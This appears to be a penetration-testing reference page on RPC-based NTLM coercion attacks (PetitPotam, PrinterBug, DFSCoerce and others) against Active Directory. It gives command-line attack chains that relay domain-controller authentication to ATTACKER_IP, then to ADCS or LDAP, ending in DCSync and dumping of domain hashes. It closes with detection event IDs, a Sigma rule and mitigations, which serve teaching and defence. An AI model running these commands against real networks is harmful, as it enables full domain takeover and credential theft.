RPC-Based NTLM Coercion¶
Overview¶
RPC-based coercion is the most powerful class of NTLM hash disclosure attacks because it requires zero user interaction. An attacker with network access (and in some cases, zero credentials) can force a Windows server — including Domain Controllers — to authenticate to an attacker-controlled listener.
The captured machine account NTLM hash can then be relayed to:
- LDAP → Add DCSync rights, create admin accounts, modify ACLs
- AD CS (ADCS) → Request certificates for the machine account → Authenticate as DC
- SMB → Execute code on other servers
sequenceDiagram
participant A as 🔴 Attacker
participant DC as 🏰 Domain Controller
participant Target as 🎯 Relay Target<br/>(ADCS/LDAP/SMB)
A->>DC: RPC Call (PetitPotam/PrinterBug/etc.)
Note over DC: "Please authenticate to<br/>\\ATTACKER for file operation"
DC->>A: NTLM Auth (Machine Account)
A->>Target: Relay NTLM to target
Target-->>A: Authenticated session<br/>as DC machine account
Note over A,Target: DCSync / Certificate / Admin
The Big Five: Core Coercion Techniques¶
1. PetitPotam (MS-EFSR)¶
| Property | Detail |
|---|---|
| Protocol | MS-EFSR (Encrypting File System Remote) |
| Function Abused | EfsRpcOpenFileRaw (and others) |
| CVE | CVE-2021-36942 |
| Auth Required? | ❌ Unauthenticated on unpatched DCs |
| Patched? | Partially — unauthenticated path patched, authenticated still works |
| Impact | Force DC to authenticate to attacker |
The most famous coercion technique. Discovered by researcher "topotam" in July 2021.
# Unauthenticated (unpatched DCs only)
python3 PetitPotam.py ATTACKER_IP DC_IP
# Authenticated (works on all DCs)
python3 PetitPotam.py -u 'user' -p 'password' -d 'domain.local' ATTACKER_IP DC_IP
Abused Functions (any of these can trigger coercion):
EfsRpcOpenFileRawEfsRpcEncryptFileSrvEfsRpcDecryptFileSrvEfsRpcQueryUsersOnFileEfsRpcQueryRecoveryAgents
2. PrinterBug / SpoolSample (MS-RPRN)¶
| Property | Detail |
|---|---|
| Protocol | MS-RPRN (Print System Remote) |
| Function Abused | RpcRemoteFindFirstPrinterChangeNotificationEx |
| CVE | None (by design) |
| Auth Required? | ✅ Any authenticated domain user |
| Patched? | ❌ Not a vulnerability — "intended functionality" |
| Impact | Force any server with Spooler running to authenticate |
The PrinterBug is unique because Microsoft considers it intended functionality of the Print Spooler service. Any authenticated user can request change notifications from any server's Print Spooler, causing it to authenticate back to the caller.
# Using SpoolSample
SpoolSample.exe DC01 ATTACKER_MACHINE
# Using printerbug.py (Impacket)
python3 printerbug.py 'domain.local/user:Password@DC01' ATTACKER_IP
# Using Coercer
python3 coercer.py coerce -u 'user' -p 'Password' -d 'domain.local' -l ATTACKER_IP -t DC01
Requires Spooler Running
The Print Spooler service must be running on the target. On modern DCs it's often disabled (best practice), but many environments still have it enabled. Check with:
3. DFSCoerce (MS-DFSNM)¶
| Property | Detail |
|---|---|
| Protocol | MS-DFSNM (Distributed File System Namespace Management) |
| Function Abused | NetrDfsRemoveStdRoot, NetrDfsAddStdRoot |
| CVE | None assigned |
| Auth Required? | ✅ Any authenticated domain user |
| Patched? | ❌ Not patched as of 2026 |
| Impact | Force DC to authenticate to attacker |
Discovered in June 2022 by Filip Dragovic. Abuses the DFS Namespace management RPC interface.
# Using DFSCoerce
python3 dfscoerce.py -u 'user' -p 'Password' -d 'domain.local' ATTACKER_IP DC01
# Using Coercer
python3 coercer.py coerce -u 'user' -p 'Password' -d 'domain.local' -l ATTACKER_IP -t DC01 --filter-protocol-name MS-DFSNM
4. ShadowCoerce (MS-FSRVP)¶
| Property | Detail |
|---|---|
| Protocol | MS-FSRVP (File Server Remote VSS Protocol) |
| Function Abused | IsPathSupported, IsPathShadowCopied |
| CVE | None assigned |
| Auth Required? | ✅ Any authenticated domain user |
| Patched? | ❌ Not patched |
| Impact | Force file servers to authenticate |
Abuses the File Server VSS Agent (used by backup software). Works against file servers, not DCs typically.
5. CheeseOunce / Coerce via MS-EVEN¶
| Property | Detail |
|---|---|
| Protocol | MS-EVEN (EventLog Remoting) |
| Function Abused | ElfrOpenBELA (Backup Event Log) |
| Auth Required? | ✅ Authenticated |
| Patched? | Varies |
Forces the target to write an event log backup to a UNC path, triggering NTLM authentication.
Additional Coercion Vectors¶
| Vector | Protocol | Function | Status |
|---|---|---|---|
| MS-RPRN (PrinterBug) | Print Spooler | RpcRemoteFindFirstPrinterChangeNotificationEx |
Working |
| MS-EFSR (PetitPotam) | EFS | EfsRpcOpenFileRaw + others |
Authenticated only |
| MS-DFSNM (DFSCoerce) | DFS | NetrDfsRemoveStdRoot |
Working |
| MS-FSRVP (ShadowCoerce) | VSS Agent | IsPathSupported |
Working |
| MS-EVEN (CheeseOunce) | EventLog | ElfrOpenBELA |
Working |
| MS-SAMR | SAM | Various enumeration calls | Limited |
| MS-LSAT | LSA Translate | Name lookup functions | Limited |
| MS-WKST | Workstation | NetrWkstaUserEnum |
Working |
| MS-NETLOGON | Netlogon | Various | Partially patched |
The Universal Tool: Coercer¶
Coercer automates ALL known coercion methods in one tool:
# Scan what methods are available on target
python3 coercer.py scan -u 'user' -p 'Pass' -d 'domain.local' -t DC01
# Coerce using all available methods
python3 coercer.py coerce -u 'user' -p 'Pass' -d 'domain.local' -l ATTACKER_IP -t DC01
# Coerce using specific protocol
python3 coercer.py coerce -u 'user' -p 'Pass' -d 'domain.local' -l ATTACKER_IP -t DC01 --filter-protocol-name MS-EFSR
# Use WebDAV instead of SMB (for HTTP relay)
python3 coercer.py coerce -u 'user' -p 'Pass' -d 'domain.local' -l ATTACKER_IP -t DC01 --listener-type http
Attack Chains: Coercion → Domain Admin¶
Chain 1: Coercion → ADCS → Domain Admin (ESC8)¶
The most common modern escalation path:
flowchart TD
A["Low-Priv Domain User"] --> B["PetitPotam / PrinterBug<br/>against DC"]
B --> C["DC NTLM Auth captured<br/>by ntlmrelayx"]
C --> D["Relay to ADCS Web Enrollment<br/>(http://ca/certsrv)"]
D --> E["Obtain DC Machine<br/>Certificate"]
E --> F["PKINIT Auth as DC<br/>(Rubeus/certipy)"]
F --> G["DCSync → All Domain Hashes"]
style A fill:#1a1a2e
style G fill:#4a0000,stroke:#ff4444
# 1. Start ntlmrelayx targeting ADCS
impacket-ntlmrelayx -t http://ca.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
# 2. Trigger coercion
python3 PetitPotam.py -u user -p pass -d corp.local ATTACKER_IP dc01.corp.local
# 3. Use the obtained certificate
certipy auth -pfx dc01.pfx -dc-ip 10.10.10.1
# 4. DCSync with the DC machine account
impacket-secretsdump -k -no-pass dc01.corp.local
Chain 2: Coercion → LDAP → DCSync Rights¶
# 1. Relay to LDAP (requires no SMB signing on DC — rare but exists)
impacket-ntlmrelayx -t ldap://dc01.corp.local --escalate-user attacker_user
# 2. Trigger coercion
python3 PetitPotam.py ATTACKER_IP dc01.corp.local
# 3. attacker_user now has DCSync rights
impacket-secretsdump -just-dc corp.local/attacker_user:Password@dc01.corp.local
Chain 3: Coercion → WebDAV → RBCD¶
When SMB signing is enforced (blocking direct relay), use WebDAV coercion:
# 1. Start ntlmrelayx for RBCD
impacket-ntlmrelayx -t ldap://dc01.corp.local --delegate-access --escalate-user attacker$
# 2. Coerce via WebDAV (HTTP-based, bypasses SMB signing)
python3 coercer.py coerce -u user -p pass -d corp.local -l ATTACKER_IP@80/path -t dc01 --listener-type http
# 3. Use RBCD to impersonate admin
impacket-getST -spn cifs/dc01.corp.local -impersonate Administrator 'corp.local/attacker$:Pass'
Pre-Requisite Checks¶
Is the Spooler Running?¶
impacket-rpcdump @DC01 | grep -i "MS-RPRN\|spoolss"
# or
crackmapexec smb DC01 -u user -p pass -M spooler
Is ADCS Web Enrollment Exposed?¶
curl -s http://ca.corp.local/certsrv/ | head -5
# or
certipy find -u user@corp.local -p pass -dc-ip 10.10.10.1 -vulnerable
Is SMB Signing Required?¶
crackmapexec smb DC01 --gen-relay-list unsigned.txt
# Targets WITHOUT signing enforced are relayable
Detection¶
Event IDs¶
| Event ID | Source | Indicates |
|---|---|---|
| 5145 | Security | Network share accessed — watch for \PIPE\efsrpc, \PIPE\spoolss, \PIPE\netdfs |
| 4624 | Security | Logon type 3 (Network) from unexpected IPs using DC machine account |
| 4648 | Security | Explicit credential use (relay attempts) |
| 13 | Sysmon | Registry modified for persistence after coercion |
Sigma Rule: EFS RPC Coercion (PetitPotam)¶
title: PetitPotam NTLM Coercion Attempt
status: stable
logsource:
product: windows
service: security
detection:
selection:
EventID: 5145
ShareName: '\\*\IPC$'
RelativeTargetName|contains:
- 'efsrpc'
- 'lsarpc'
- 'efsr'
condition: selection
level: high
Mitigations¶
1. Enforce SMB Signing on All Domain Controllers¶
Computer Configuration → Policies → Windows Settings → Security Settings →
Local Policies → Security Options:
Microsoft network server: Digitally sign communications (always) → Enabled
This prevents relay to SMB targets but does NOT prevent relay to HTTP/LDAP.
2. Enforce LDAP Signing + Channel Binding¶
Computer Configuration → Policies → Windows Settings → Security Settings →
Local Policies → Security Options:
Domain controller: LDAP server signing requirements → Require signing
Domain controller: LDAP server channel binding token requirements → Always
3. Enforce EPA (Extended Protection for Authentication) on ADCS¶
# On the CA web enrollment server
Set-WebConfigurationProperty -Filter "/system.webServer/security/authentication/windowsAuthentication" -Name "extendedProtection.tokenChecking" -Value "Require" -PSPath "IIS:\Sites\Default Web Site\CertSrv"
4. Disable Print Spooler on DCs¶
5. Apply PetitPotam Patch + Block Unauthenticated EFS¶
Install the latest Windows security updates. Additionally, block unauthenticated RPC to the EFS pipe via Windows Firewall rules.
6. Restrict NTLM Authentication¶
Group Policy: Network security: Restrict NTLM: NTLM authentication in this domain → Deny all / Audit first.
Tools Reference¶
| Tool | Purpose |
|---|---|
| PetitPotam | MS-EFSR coercion |
| SpoolSample | MS-RPRN PrinterBug |
| DFSCoerce | MS-DFSNM coercion |
| ShadowCoerce | MS-FSRVP coercion |
| Coercer | Universal coercion tool (all methods) |
| ntlmrelayx | NTLM relay framework |
| Certipy | ADCS exploitation |
| Responder | Hash capture |
| mitm6 | IPv6 DNS poisoning for coercion |
| Pretender | Modern Responder alternative |
References¶
- Palo Alto Unit 42 — Authentication Coercion Keeps Evolving
- SpecterOps — Certified Pre-Owned (ADCS whitepaper)
- rootsecdev — Relay Bible
- topotam — PetitPotam
- p0dalirius — Coercer